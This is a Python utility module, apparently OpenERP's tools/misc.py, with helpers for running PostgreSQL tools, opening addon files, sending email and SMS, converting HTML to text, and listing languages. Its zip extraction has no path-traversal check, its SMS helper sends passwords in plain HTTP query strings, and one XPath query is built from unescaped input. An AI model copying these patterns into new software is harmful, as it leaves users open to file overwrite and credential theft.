# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#.apidoc title: Utilities: tools.misc
"""
Miscelleanous tools used by OpenERP.
"""
from functools import wraps
import inspect
import subprocess
import logging
import os
import re
import smtplib
import socket
import sys
import threading
import time
import zipfile
from collections import defaultdict
from datetime import datetime
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email.MIMEMultipart import MIMEMultipart
from email.Header import Header
from email.Utils import formatdate, COMMASPACE
from email import Utils
from email import Encoders
from itertools import islice, izip
from lxml import etree
from which import which
from threading import local
try:
from html2text import html2text
except ImportError:
html2text = None
import openerp.loglevels as loglevels
import openerp.pooler as pooler
from config import config
from cache import *
# get_encodings, ustr and exception_to_unicode were originally from tools.misc.
# There are moved to loglevels until we refactor tools.
from openerp.loglevels import get_encodings, ustr, exception_to_unicode
_logger = logging.getLogger(__name__)
# List of etree._Element subclasses that we choose to ignore when parsing XML.
# We include the *Base ones just in case, currently they seem to be subclasses of the _* ones.
SKIPPED_ELEMENT_TYPES = (etree._Comment, etree._ProcessingInstruction, etree.CommentBase, etree.PIBase)
def find_in_path(name):
    """Return the full path of executable *name*, or None if not found."""
    try:
        return which(name)
    except IOError:
        return None
def find_pg_tool(name):
    """Locate a PostgreSQL client tool, honouring the 'pg_path' config option.

    Returns the tool's full path, or None if it cannot be found.
    """
    path = None
    if config['pg_path'] and config['pg_path'] != 'None':
        path = config['pg_path']
    try:
        return which(name, path=path)
    except IOError:
        return None
def exec_pg_command(name, *args):
    """Run PostgreSQL tool *name* synchronously and return its exit code.

    Raises Exception if the tool cannot be located.
    """
    prog = find_pg_tool(name)
    if not prog:
        raise Exception('Couldn\'t find %s' % name)
    args2 = (prog,) + args
    return subprocess.call(args2)
def exec_pg_command_pipe(name, *args):
    """Spawn PostgreSQL tool *name* and return its (stdin, stdout) pipes."""
    prog = find_pg_tool(name)
    if not prog:
        raise Exception('Couldn\'t find %s' % name)
    # on win32, passing close_fds=True is not compatible
    # with redirecting std[in/err/out]
    pop = subprocess.Popen((prog,) + args, bufsize= -1,
                           stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                           close_fds=(os.name=="posix"))
    return (pop.stdin, pop.stdout)
def exec_command_pipe(name, *args):
    """Spawn executable *name* (found on $PATH) and return its
    (stdin, stdout) pipes."""
    prog = find_in_path(name)
    if not prog:
        raise Exception('Couldn\'t find %s' % name)
    # on win32, passing close_fds=True is not compatible
    # with redirecting std[in/err/out]
    pop = subprocess.Popen((prog,) + args, bufsize= -1,
                           stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                           close_fds=(os.name=="posix"))
    return (pop.stdin, pop.stdout)
#----------------------------------------------------------
# File paths
#----------------------------------------------------------
#file_path_root = os.getcwd()
#file_path_addons = os.path.join(file_path_root, 'addons')
def file_open(name, mode="r", subdir='addons', pathinfo=False):
    """Open a file from the OpenERP root, using a subdir folder.

    Example::

        >>> file_open('hr/report/timesheer.xsl')
        >>> file_open('addons/hr/report/timesheet.xsl')
        >>> file_open('../../base/report/rml_template.xsl', subdir='addons/hr/report', pathinfo=True)

    @param name name of the file
    @param mode file open mode
    @param subdir subdirectory
    @param pathinfo if True returns tupple (fileobject, filepath)

    @return fileobject if pathinfo is False else (fileobject, filepath)
    """
    import openerp.modules as addons
    adps = addons.module.ad_paths
    rtp = os.path.normcase(os.path.abspath(config['root_path']))
    # Normalise an explicit "addons/..." prefix into the subdir mechanism.
    if name.replace(os.path.sep, '/').startswith('addons/'):
        subdir = 'addons'
        name = name[7:]
    # First try to locate in addons_path
    if subdir:
        subdir2 = subdir
        if subdir2.replace(os.path.sep, '/').startswith('addons/'):
            subdir2 = subdir2[7:]
        subdir2 = (subdir2 != 'addons' or None) and subdir2
        for adp in adps:
            try:
                if subdir2:
                    fn = os.path.join(adp, subdir2, name)
                else:
                    fn = os.path.join(adp, name)
                fn = os.path.normpath(fn)
                # Recurse with subdir=None so only this exact path is tried.
                fo = file_open(fn, mode=mode, subdir=None, pathinfo=pathinfo)
                if pathinfo:
                    return fo, fn
                return fo
            except IOError:
                # Not in this addons directory; try the next one.
                pass
    if subdir:
        name = os.path.join(rtp, subdir, name)
    else:
        name = os.path.join(rtp, name)
    name = os.path.normpath(name)
    # Check for a zipfile in the path
    head = name
    zipname = False
    name2 = False
    while True:
        # Walk up the path, testing each ancestor for a sibling .zip archive.
        head, tail = os.path.split(head)
        if not tail:
            break
        if zipname:
            zipname = os.path.join(tail, zipname)
        else:
            zipname = tail
        if zipfile.is_zipfile(head+'.zip'):
            from cStringIO import StringIO
            zfile = zipfile.ZipFile(head+'.zip')
            try:
                fo = StringIO()
                fo.write(zfile.read(os.path.join(
                    os.path.basename(head), zipname).replace(
                        os.sep, '/')))
                fo.seek(0)
                if pathinfo:
                    return fo, name
                return fo
            except Exception:
                # Entry not in this archive; remember the candidate path.
                name2 = os.path.normpath(os.path.join(head + '.zip', zipname))
                pass
    for i in (name2, name):
        if i and os.path.isfile(i):
            fo = file(i, mode)
            if pathinfo:
                return fo, i
            return fo
    if os.path.splitext(name)[1] == '.rml':
        raise IOError, 'Report %s doesn\'t exist or deleted : ' %str(name)
    raise IOError, 'File not found : %s' % name
#----------------------------------------------------------
# iterables
#----------------------------------------------------------
def flatten(list):
    """Flatten a list of elements into a unique flat list.
    Author: Christophe Simonis (christophe@tinyerp.com)
    Examples::
    >>> flatten(['a'])
    ['a']
    >>> flatten('b')
    ['b']
    >>> flatten( [] )
    []
    >>> flatten( [[], [[]]] )
    []
    >>> flatten( [[['a','b'], 'c'], 'd', ['e', [], 'f']] )
    ['a', 'b', 'c', 'd', 'e', 'f']
    >>> t = (1,2,(3,), [4, 5, [6, [7], (8, 9), ([10, 11, (12, 13)]), [14, [], (15,)], []]])
    >>> flatten(t)
    [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
    """
    def isiterable(x):
        # str/bytes define __iter__ on Python 3 but must stay atomic, as
        # they already were on Python 2 (where they lack __iter__).
        return hasattr(x, "__iter__") and not isinstance(x, (str, bytes))
    r = []
    for e in list:
        if isiterable(e):
            # extend() replaces the former `map(r.append, flatten(e))`,
            # which silently does nothing on Python 3 (map became lazy).
            r.extend(flatten(e))
        else:
            r.append(e)
    return r
def reverse_enumerate(l):
    """Like enumerate, but in the other sense: iterate from the end.

    Returns an iterator of (index, element) pairs, highest index first.
    Usage::
    >>> a = ['a', 'b', 'c']
    >>> it = reverse_enumerate(a)
    >>> next(it)
    (2, 'c')
    >>> next(it)
    (1, 'b')
    >>> next(it)
    (0, 'a')
    >>> next(it)
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    StopIteration
    """
    # Materialize enumerate() once and hand back a reverse iterator.
    # Replaces the former izip/xrange combination, which no longer
    # exists on Python 3 (itertools.izip and xrange were removed).
    return reversed(list(enumerate(l)))
#----------------------------------------------------------
# Emails
#----------------------------------------------------------
email_re = re.compile(r"""
([a-zA-Z][\w\.-]*[a-zA-Z0-9] # username part
@ # mandatory @ sign
[a-zA-Z0-9][\w\.-]* # domain must start with a letter ... Ged> why do we include a 0-9 then?
\.
[a-z]{2,3} # TLD
)
""", re.VERBOSE)
res_re = re.compile(r"\[([0-9]+)\]", re.UNICODE)
command_re = re.compile("^Set-([a-z]+) *: *(.+)$", re.I + re.UNICODE)
reference_re = re.compile("<.*-open(?:object|erp)-(\\d+).*@(.*)>", re.UNICODE)
def html2plaintext(html, body_id=None, encoding='utf-8'):
    """ From an HTML text, convert the HTML to plain text.
    If @param body_id is provided then this is the tag where the
    body (not necessarily <body>) starts.
    """
    ## (c) Fry-IT, www.fry-it.com, 2007
    ## <peter@fry-it.com>
    ## download here: http://www.peterbe.com/plog/html2plaintext
    html = ustr(html)
    from lxml.etree import tostring
    try:
        # Prefer the lenient BeautifulSoup-backed parser when available.
        from lxml.html.soupparser import fromstring
        kwargs = {}
    except ImportError:
        _logger.debug('tools.misc.html2plaintext: cannot use BeautifulSoup, fallback to lxml.etree.HTMLParser')
        from lxml.etree import fromstring, HTMLParser
        kwargs = dict(parser=HTMLParser())
    tree = fromstring(html, **kwargs)
    if body_id is not None:
        # NOTE(review): body_id is interpolated verbatim into the XPath, so
        # the caller must pass an already-quoted value (e.g. "'my_id'").
        source = tree.xpath('//*[@id=%s]'%(body_id,))
    else:
        source = tree.xpath('//body')
    if len(source):
        tree = source[0]
    # Turn every link into "<text> [<n>]" and remember its URL so a numbered
    # reference list can be appended at the end.
    url_index = []
    i = 0
    for link in tree.findall('.//a'):
        url = link.get('href')
        if url:
            i += 1
            link.tag = 'span'
            link.text = '%s [%s]' % (link.text, i)
            url_index.append(url)
    html = ustr(tostring(tree, encoding=encoding))
    # Crude markdown-ish rendering of emphasis/structure tags, after which
    # every remaining tag is stripped.
    html = html.replace('<strong>','*').replace('</strong>','*')
    html = html.replace('<b>','*').replace('</b>','*')
    html = html.replace('<h3>','*').replace('</h3>','*')
    html = html.replace('<h2>','**').replace('</h2>','**')
    html = html.replace('<h1>','**').replace('</h1>','**')
    html = html.replace('<em>','/').replace('</em>','/')
    html = html.replace('<tr>', '\n')
    html = html.replace('</p>', '\n')
    html = re.sub('<br\s*/?>', '\n', html)
    html = re.sub('<.*?>', ' ', html)
    html = html.replace(' ' * 2, ' ')
    # strip all lines
    html = '\n'.join([x.strip() for x in html.splitlines()])
    html = html.replace('\n' * 2, '\n')
    # Append the collected link targets as "[n] url" footnotes.
    for i, url in enumerate(url_index):
        if i == 0:
            html += '\n\n'
        html += ustr('[%s] %s\n') % (i+1, url)
    return html
def generate_tracking_message_id(res_id):
    """Returns a string that can be used in the Message-ID RFC822 header field
    Used to track the replies related to a given object thanks to the "In-Reply-To"
    or "References" fields that Mail User Agents will set.
    """
    # "<timestamp>-openerp-<res_id>@<host>" — parsed back by reference_re.
    return "<{0}-openerp-{1}@{2}>".format(time.time(), res_id, socket.gethostname())
def email_send(email_from, email_to, subject, body, email_cc=None, email_bcc=None, reply_to=False,
               attachments=None, message_id=None, references=None, openobject_id=False, debug=False, subtype='plain', headers=None,
               smtp_server=None, smtp_port=None, ssl=False, smtp_user=None, smtp_password=None, cr=None, uid=None):
    """Low-level function for sending an email (deprecated).
    :deprecate: since OpenERP 6.1, please use ir.mail_server.send_email() instead.
    :param email_from: A string used to fill the `From` header, if falsy,
                       config['email_from'] is used instead. Also used for
                       the `Reply-To` header if `reply_to` is not provided
    :param email_to: a sequence of addresses to send the mail to.
    :return: the result of ir.mail_server.send_email(), or False on failure.
    """
    # If not cr, get cr from current thread database
    local_cr = None
    if not cr:
        db_name = getattr(threading.currentThread(), 'dbname', None)
        if db_name:
            # A cursor opened here is ours to close (tracked via local_cr).
            local_cr = cr = pooler.get_db_only(db_name).cursor()
        else:
            raise Exception("No database cursor found, please pass one explicitly")
    # Send Email
    try:
        mail_server_pool = pooler.get_pool(cr.dbname).get('ir.mail_server')
        res = False
        # Pack Message into MIME Object
        email_msg = mail_server_pool.build_email(email_from, email_to, subject, body, email_cc, email_bcc, reply_to,
            attachments, message_id, references, openobject_id, subtype, headers=headers)
        res = mail_server_pool.send_email(cr, uid or 1, email_msg, mail_server_id=None,
            smtp_server=smtp_server, smtp_port=smtp_port, smtp_user=smtp_user, smtp_password=smtp_password,
            smtp_encryption=('ssl' if ssl else None), smtp_debug=debug)
    except Exception:
        # Deliberate best-effort: delivery failures are logged, False returned.
        _logger.exception("tools.email_send failed to deliver email")
        return False
    finally:
        if local_cr: local_cr.close()
    return res
#----------------------------------------------------------
# SMS
#----------------------------------------------------------
# text must be latin-1 encoded
def sms_send(user, password, api_id, text, to):
    """Send an SMS through the urlsms.com HTTP gateway (fire-and-forget).

    Uses the Python 2 urllib API (urlencode/urlopen). Always returns True,
    regardless of the gateway's response.
    """
    import urllib
    url = "http://api.urlsms.com/SendSMS.aspx"
    #url = "http://196.7.150.220/http/sendmsg"
    # NOTE(review): credentials travel as plain-text query parameters over HTTP.
    params = urllib.urlencode({'UserID': user, 'Password': password, 'SenderID': api_id, 'MsgText': text, 'RecipientMobileNo':to})
    urllib.urlopen(url+"?"+params)
    # FIXME: Use the logger if there is an error
    return True
class UpdateableStr(local):
    """Thread-local mutable string holder (used in wizards).

    The wrapped value can be swapped at any time through the ``string``
    attribute; str() and repr() always reflect the current value.
    """
    def __init__(self, string=''):
        self.string = string
    def __str__(self):
        return str(self.string)
    def __repr__(self):
        return str(self.string)
    def __nonzero__(self):
        # Python 2 truth protocol: an empty wrapped string is falsy.
        return bool(self.string)
class UpdateableDict(local):
    """Thread-local, updateable dict wrapper to use in wizards.

    Every mapping operation is delegated to the wrapped ``self.dict``;
    the wrapper itself only adds thread-locality (via ``local``).
    """
    def __init__(self, dict=None):
        # Avoid the shared-mutable-default trap: build a fresh dict per call.
        if dict is None:
            dict = {}
        self.dict = dict
    def __str__(self):
        return str(self.dict)
    def __repr__(self):
        return str(self.dict)
    def clear(self):
        return self.dict.clear()
    def keys(self):
        return self.dict.keys()
    def __setitem__(self, i, y):
        self.dict.__setitem__(i, y)
    def __getitem__(self, i):
        return self.dict.__getitem__(i)
    def copy(self):
        return self.dict.copy()
    def iteritems(self):
        return self.dict.iteritems()
    def iterkeys(self):
        return self.dict.iterkeys()
    def itervalues(self):
        return self.dict.itervalues()
    def pop(self, k, d=None):
        return self.dict.pop(k, d)
    def popitem(self):
        return self.dict.popitem()
    def setdefault(self, k, d=None):
        return self.dict.setdefault(k, d)
    def update(self, E, **F):
        # BUGFIX: forward the keyword arguments as keywords. dict.update()
        # accepts at most one positional argument, so the previous
        # `self.dict.update(E, F)` call always raised TypeError.
        return self.dict.update(E, **F)
    def values(self):
        return self.dict.values()
    def get(self, k, d=None):
        return self.dict.get(k, d)
    def has_key(self, k):
        # Python 2 API kept for backward compatibility with existing callers.
        return self.dict.has_key(k)
    def items(self):
        return self.dict.items()
    def __cmp__(self, y):
        return self.dict.__cmp__(y)
    def __contains__(self, k):
        return self.dict.__contains__(k)
    def __delitem__(self, y):
        return self.dict.__delitem__(y)
    def __eq__(self, y):
        return self.dict.__eq__(y)
    def __ge__(self, y):
        return self.dict.__ge__(y)
    def __gt__(self, y):
        return self.dict.__gt__(y)
    def __hash__(self):
        return self.dict.__hash__()
    def __iter__(self):
        return self.dict.__iter__()
    def __le__(self, y):
        return self.dict.__le__(y)
    def __len__(self):
        return self.dict.__len__()
    def __lt__(self, y):
        return self.dict.__lt__(y)
    def __ne__(self, y):
        return self.dict.__ne__(y)
class currency(float):
    """Deprecated rounded-float type.

    .. warning::
       Don't use ! Use res.currency.round()
    """
    def __new__(cls, value, accuracy=2, rounding=None):
        # The float value itself is rounded once, at construction time.
        return float.__new__(cls, round(value, accuracy))
    def __init__(self, value, accuracy=2, rounding=None):
        self.rounding = 10 ** -accuracy if rounding is None else rounding
        self.accuracy = accuracy
def to_xml(s):
    """Escape the XML special characters of ``s``.

    '&' must be escaped first, otherwise it would re-escape the ampersands
    introduced for '<' and '>'. (The previous body replaced each character
    with itself — the entity references had been lost, making it a no-op.)
    """
    return s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
def get_iso_codes(lang):
    """Collapse redundant locale codes such as 'fr_FR' to their short form.

    'xx_XX' becomes 'xx' when the territory merely repeats the language;
    anything else ('fr_BE', 'sr@latin', 'en') is returned unchanged.
    """
    parts = lang.split('_')
    if len(parts) > 1 and parts[0] == parts[1].lower():
        return parts[0]
    return lang
def get_languages():
    """Return the mapping of supported locale codes to display names.

    Display names are "English name / native name" unicode strings.
    """
    # The codes below are those from Launchpad's Rosetta, with the exception
    # of some trivial codes where the Launchpad code is xx and we have xx_XX.
    languages={
        'ab_RU': u'Abkhazian / аҧсуа',
        'ar_AR': u'Arabic / الْعَرَبيّة',
        'bg_BG': u'Bulgarian / български език',
        'bs_BS': u'Bosnian / bosanski jezik',
        'ca_ES': u'Catalan / Català',
        'cs_CZ': u'Czech / Čeština',
        'da_DK': u'Danish / Dansk',
        'de_DE': u'German / Deutsch',
        'el_GR': u'Greek / Ελληνικά',
        'en_CA': u'English (CA)',
        'en_GB': u'English (UK)',
        'en_US': u'English (US)',
        'es_AR': u'Spanish (AR) / Español (AR)',
        'es_BO': u'Spanish (BO) / Español (BO)',
        'es_CL': u'Spanish (CL) / Español (CL)',
        'es_CO': u'Spanish (CO) / Español (CO)',
        'es_CR': u'Spanish (CR) / Español (CR)',
        'es_DO': u'Spanish (DO) / Español (DO)',
        'es_EC': u'Spanish (EC) / Español (EC)',
        'es_ES': u'Spanish / Español',
        'es_GT': u'Spanish (GT) / Español (GT)',
        'es_HN': u'Spanish (HN) / Español (HN)',
        'es_MX': u'Spanish (MX) / Español (MX)',
        'es_NI': u'Spanish (NI) / Español (NI)',
        'es_PA': u'Spanish (PA) / Español (PA)',
        'es_PE': u'Spanish (PE) / Español (PE)',
        'es_PR': u'Spanish (PR) / Español (PR)',
        'es_PY': u'Spanish (PY) / Español (PY)',
        'es_SV': u'Spanish (SV) / Español (SV)',
        'es_UY': u'Spanish (UY) / Español (UY)',
        'es_VE': u'Spanish (VE) / Español (VE)',
        'et_EE': u'Estonian / Eesti keel',
        'fa_IR': u'Persian / فارس',
        'fi_FI': u'Finnish / Suomi',
        'fr_BE': u'French (BE) / Français (BE)',
        'fr_CH': u'French (CH) / Français (CH)',
        'fr_FR': u'French / Français',
        'gl_ES': u'Galician / Galego',
        'gu_IN': u'Gujarati / ગુજરાતી',
        'he_IL': u'Hebrew / עִבְרִי',
        'hi_IN': u'Hindi / हिंदी',
        'hr_HR': u'Croatian / hrvatski jezik',
        'hu_HU': u'Hungarian / Magyar',
        'id_ID': u'Indonesian / Bahasa Indonesia',
        'it_IT': u'Italian / Italiano',
        'iu_CA': u'Inuktitut / ᐃᓄᒃᑎᑐᑦ',
        'ja_JP': u'Japanese / 日本語',
        'ko_KP': u'Korean (KP) / 한국어 (KP)',
        'ko_KR': u'Korean (KR) / 한국어 (KR)',
        'lt_LT': u'Lithuanian / Lietuvių kalba',
        'lv_LV': u'Latvian / latviešu valoda',
        'ml_IN': u'Malayalam / മലയാളം',
        'mn_MN': u'Mongolian / монгол',
        'nb_NO': u'Norwegian Bokmål / Norsk bokmål',
        'nl_NL': u'Dutch / Nederlands',
        'nl_BE': u'Flemish (BE) / Vlaams (BE)',
        'oc_FR': u'Occitan (FR, post 1500) / Occitan',
        'pl_PL': u'Polish / Język polski',
        'pt_BR': u'Portugese (BR) / Português (BR)',
        'pt_PT': u'Portugese / Português',
        'ro_RO': u'Romanian / română',
        'ru_RU': u'Russian / русский язык',
        'si_LK': u'Sinhalese / සිංහල',
        'sl_SI': u'Slovenian / slovenščina',
        'sk_SK': u'Slovak / Slovenský jazyk',
        'sq_AL': u'Albanian / Shqip',
        'sr_RS': u'Serbian (Cyrillic) / српски',
        'sr@latin': u'Serbian (Latin) / srpski',
        'sv_SE': u'Swedish / svenska',
        'te_IN': u'Telugu / తెలుగు',
        'tr_TR': u'Turkish / Türkçe',
        'vi_VN': u'Vietnamese / Tiếng Việt',
        'uk_UA': u'Ukrainian / українська',
        'ur_PK': u'Urdu / اردو',
        'zh_CN': u'Chinese (CN) / 简体中文',
        'zh_HK': u'Chinese (HK)',
        'zh_TW': u'Chinese (TW) / 正體字',
        'th_TH': u'Thai / ภาษาไทย',
        'tlh_TLH': u'Klingon',
    }
    return languages
def scan_languages():
    """Return [(code, display name)] pairs for every known language.

    Takes all languages from get_languages() without filtering against the
    base module's languages; the result is sorted by display name.
    """
    known = get_languages()
    pairs = [(code, known.get(code, code)) for code in list(known)]
    return sorted(pairs, key=lambda pair: pair[1])
def get_user_companies(cr, user):
    """Return the id of ``user``'s own company followed by the ids of every
    company below it in the res_company parent/child hierarchy."""
    def _get_company_children(cr, ids):
        # One SQL query per hierarchy level; recursion stops at an empty level.
        # NOTE(review): a parent_id cycle in res_company would recurse forever.
        if not ids:
            return []
        cr.execute('SELECT id FROM res_company WHERE parent_id IN %s', (tuple(ids),))
        res = [x[0] for x in cr.fetchall()]
        res.extend(_get_company_children(cr, res))
        return res
    cr.execute('SELECT company_id FROM res_users WHERE id=%s', (user,))
    user_comp = cr.fetchone()[0]
    if not user_comp:
        return []
    return [user_comp] + _get_company_children(cr, [user_comp])
def mod10r(number):
    """
    Input number : account or invoice number
    Output return: the same number completed with the recursive mod10
    key

    Non-digit characters are copied through and do not affect the carry.
    """
    # Lookup table for the recursive modulo-10 checksum.
    check_digits = (0, 9, 4, 6, 8, 2, 7, 1, 3, 5)
    carry = 0
    out = []
    for ch in number:
        out.append(ch)
        if ch.isdigit():
            carry = check_digits[(int(ch) + carry) % 10]
    return ''.join(out) + str((10 - carry) % 10)
def human_size(sz):
    """
    Return the size in a human readable format

    ``sz`` may be a number of bytes, or anything with a length (string,
    bytes, ...), in which case its length is used. Falsy input returns
    False. Sizes never exceed the largest unit, 'Gb'.
    """
    if not sz:
        return False
    units = ('bytes', 'Kb', 'Mb', 'Gb')
    # Generalizes the former `isinstance(sz, basestring)` test (which no
    # longer exists on Python 3): anything sized contributes its length.
    if hasattr(sz, '__len__'):
        sz = len(sz)
    s, i = float(sz), 0
    while s >= 1024 and i < len(units) - 1:
        s = s / 1024
        i = i + 1
    return "%0.2f %s" % (s, units[i])
def logged(f):
    """Decorator that DEBUG-logs each call to ``f``: its arguments, its
    result and the wall-clock duration of the call."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        from pprint import pformat
        lines = ['Call -> function: %r' % f]
        for position, argument in enumerate(args):
            lines.append(' arg %02d: %s' % (position, pformat(argument)))
        for keyword, value in kwargs.items():
            lines.append(' kwarg %10s: %s' % (keyword, pformat(value)))
        started = time.time()
        result = f(*args, **kwargs)
        lines.append(' result: %s' % pformat(result))
        lines.append(' time delta: %s' % (time.time() - started))
        _logger.debug('\n'.join(lines))
        return result
    return wrapper
class profile(object):
    """Decorator that profiles every call to the wrapped function with
    cProfile, dumping the stats to ``fname`` (default: '<funcname>.cprof').
    """
    def __init__(self, fname=None):
        self.fname = fname
    def __call__(self, f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            # cProfile.runctx needs a zero-argument statement to execute, so
            # capture the call and its result in a tiny recorder object.
            class _Recorder(object):
                def __init__(self):
                    self.result = None
                def __call__(self):
                    self.result = f(*args, **kwargs)
            recorder = _Recorder()
            import cProfile
            target = self.fname or ("%s.cprof" % (f.func_name,))
            cProfile.runctx('recorder()', globals(), locals(), filename=target)
            return recorder.result
        return wrapper
# Icon identifiers served (as pairs) by icons() below: the standard GTK
# STOCK_* names plus the OpenERP-specific 'terp-*' names.
__icons_list = ['STOCK_ABOUT', 'STOCK_ADD', 'STOCK_APPLY', 'STOCK_BOLD',
'STOCK_CANCEL', 'STOCK_CDROM', 'STOCK_CLEAR', 'STOCK_CLOSE', 'STOCK_COLOR_PICKER',
'STOCK_CONNECT', 'STOCK_CONVERT', 'STOCK_COPY', 'STOCK_CUT', 'STOCK_DELETE',
'STOCK_DIALOG_AUTHENTICATION', 'STOCK_DIALOG_ERROR', 'STOCK_DIALOG_INFO',
'STOCK_DIALOG_QUESTION', 'STOCK_DIALOG_WARNING', 'STOCK_DIRECTORY', 'STOCK_DISCONNECT',
'STOCK_DND', 'STOCK_DND_MULTIPLE', 'STOCK_EDIT', 'STOCK_EXECUTE', 'STOCK_FILE',
'STOCK_FIND', 'STOCK_FIND_AND_REPLACE', 'STOCK_FLOPPY', 'STOCK_GOTO_BOTTOM',
'STOCK_GOTO_FIRST', 'STOCK_GOTO_LAST', 'STOCK_GOTO_TOP', 'STOCK_GO_BACK',
'STOCK_GO_DOWN', 'STOCK_GO_FORWARD', 'STOCK_GO_UP', 'STOCK_HARDDISK',
'STOCK_HELP', 'STOCK_HOME', 'STOCK_INDENT', 'STOCK_INDEX', 'STOCK_ITALIC',
'STOCK_JUMP_TO', 'STOCK_JUSTIFY_CENTER', 'STOCK_JUSTIFY_FILL',
'STOCK_JUSTIFY_LEFT', 'STOCK_JUSTIFY_RIGHT', 'STOCK_MEDIA_FORWARD',
'STOCK_MEDIA_NEXT', 'STOCK_MEDIA_PAUSE', 'STOCK_MEDIA_PLAY',
'STOCK_MEDIA_PREVIOUS', 'STOCK_MEDIA_RECORD', 'STOCK_MEDIA_REWIND',
'STOCK_MEDIA_STOP', 'STOCK_MISSING_IMAGE', 'STOCK_NETWORK', 'STOCK_NEW',
'STOCK_NO', 'STOCK_OK', 'STOCK_OPEN', 'STOCK_PASTE', 'STOCK_PREFERENCES',
'STOCK_PRINT', 'STOCK_PRINT_PREVIEW', 'STOCK_PROPERTIES', 'STOCK_QUIT',
'STOCK_REDO', 'STOCK_REFRESH', 'STOCK_REMOVE', 'STOCK_REVERT_TO_SAVED',
'STOCK_SAVE', 'STOCK_SAVE_AS', 'STOCK_SELECT_COLOR', 'STOCK_SELECT_FONT',
'STOCK_SORT_ASCENDING', 'STOCK_SORT_DESCENDING', 'STOCK_SPELL_CHECK',
'STOCK_STOP', 'STOCK_STRIKETHROUGH', 'STOCK_UNDELETE', 'STOCK_UNDERLINE',
'STOCK_UNDO', 'STOCK_UNINDENT', 'STOCK_YES', 'STOCK_ZOOM_100',
'STOCK_ZOOM_FIT', 'STOCK_ZOOM_IN', 'STOCK_ZOOM_OUT',
'terp-account', 'terp-crm', 'terp-mrp', 'terp-product', 'terp-purchase',
'terp-sale', 'terp-tools', 'terp-administration', 'terp-hr', 'terp-partner',
'terp-project', 'terp-report', 'terp-stock', 'terp-calendar', 'terp-graph',
'terp-check','terp-go-month','terp-go-year','terp-go-today','terp-document-new','terp-camera_test',
'terp-emblem-important','terp-gtk-media-pause','terp-gtk-stop','terp-gnome-cpu-frequency-applet+',
'terp-dialog-close','terp-gtk-jump-to-rtl','terp-gtk-jump-to-ltr','terp-accessories-archiver',
'terp-stock_align_left_24','terp-stock_effects-object-colorize','terp-go-home','terp-gtk-go-back-rtl',
'terp-gtk-go-back-ltr','terp-personal','terp-personal-','terp-personal+','terp-accessories-archiver-minus',
'terp-accessories-archiver+','terp-stock_symbol-selection','terp-call-start','terp-dolar',
'terp-face-plain','terp-folder-blue','terp-folder-green','terp-folder-orange','terp-folder-yellow',
'terp-gdu-smart-failing','terp-go-week','terp-gtk-select-all','terp-locked','terp-mail-forward',
'terp-mail-message-new','terp-mail-replied','terp-rating-rated','terp-stage','terp-stock_format-scientific',
'terp-dolar_ok!','terp-idea','terp-stock_format-default','terp-mail-','terp-mail_delete'
]
def icons(*a, **kw):
    """Return (name, name) pairs for every known icon; arguments ignored."""
    global __icons_list
    return [(icon, icon) for icon in __icons_list]
def extract_zip_file(zip_file, outdirectory):
    """Extract every member of ``zip_file`` under ``outdirectory``.

    Missing intermediate directories are created on the fly; members whose
    name ends with the path separator are treated as directories and not
    written as files.
    """
    archive = zipfile.ZipFile(zip_file, 'r')
    for member in archive.namelist():
        target = os.path.join(outdirectory, member)
        directory = os.path.dirname(target)
        if not os.path.exists(directory):
            os.makedirs(directory)
        if not target.endswith(os.sep):
            handle = open(target, 'wb')
            handle.write(archive.read(member))
            handle.close()
    archive.close()
def detect_ip_addr():
    """Try a very crude method to figure out a valid external
    IP or hostname for the current machine. Don't rely on this
    for binding to an interface, but it could be used as basis
    for constructing a remote URL to the server.
    """
    def _detect_ip_addr():
        from array import array
        from struct import pack, unpack
        try:
            import fcntl
        except ImportError:
            fcntl = None
        ip_addr = None
        if not fcntl: # not UNIX:
            host = socket.gethostname()
            ip_addr = socket.gethostbyname(host)
        else: # UNIX:
            # get all interfaces:
            nbytes = 128 * 32
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            names = array('B', '\0' * nbytes)
            #print 'names: ', names
            # 0x8912 is SIOCGIFCONF on Linux: fills `names` with packed
            # ifreq records, one per configured interface.
            outbytes = unpack('iL', fcntl.ioctl( s.fileno(), 0x8912, pack('iL', nbytes, names.buffer_info()[0])))[0]
            namestr = names.tostring()
            # try 64 bit kernel:
            # (ifreq records are 40 bytes: 16-byte name + address at offset 20)
            for i in range(0, outbytes, 40):
                name = namestr[i:i+16].split('\0', 1)[0]
                if name != 'lo':
                    ip_addr = socket.inet_ntoa(namestr[i+20:i+24])
                    break
            # try 32 bit kernel:
            if ip_addr is None:
                ifaces = filter(None, [namestr[i:i+32].split('\0', 1)[0] for i in range(0, outbytes, 32)])
                for ifname in [iface for iface in ifaces if iface != 'lo']:
                    # 0x8915 is SIOCGIFADDR on Linux: returns the interface address.
                    ip_addr = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, pack('256s', ifname[:15]))[20:24])
                    break
        return ip_addr or 'localhost'
    try:
        ip_addr = _detect_ip_addr()
    except Exception:
        # Any failure falls back to localhost rather than crashing the caller.
        ip_addr = 'localhost'
    return ip_addr
# RATIONALE BEHIND TIMESTAMP CALCULATIONS AND TIMEZONE MANAGEMENT:
# The server side never does any timestamp calculation, always
# sends them in a naive (timezone agnostic) format supposed to be
# expressed within the server timezone, and expects the clients to
# provide timestamps in the server timezone as well.
# It stores all timestamps in the database in naive format as well,
# which also expresses the time in the server timezone.
# For this reason the server makes its timezone name available via the
# common/timezone_get() rpc method, which clients need to read
# to know the appropriate time offset to use when reading/writing
# times.
def get_win32_timezone():
    """Attempt to return the "standard name" of the current timezone on a win32 system.
    @return the standard name of the current win32 timezone, or False if it cannot be found.
    """
    result = False
    if sys.platform == "win32":
        try:
            import _winreg
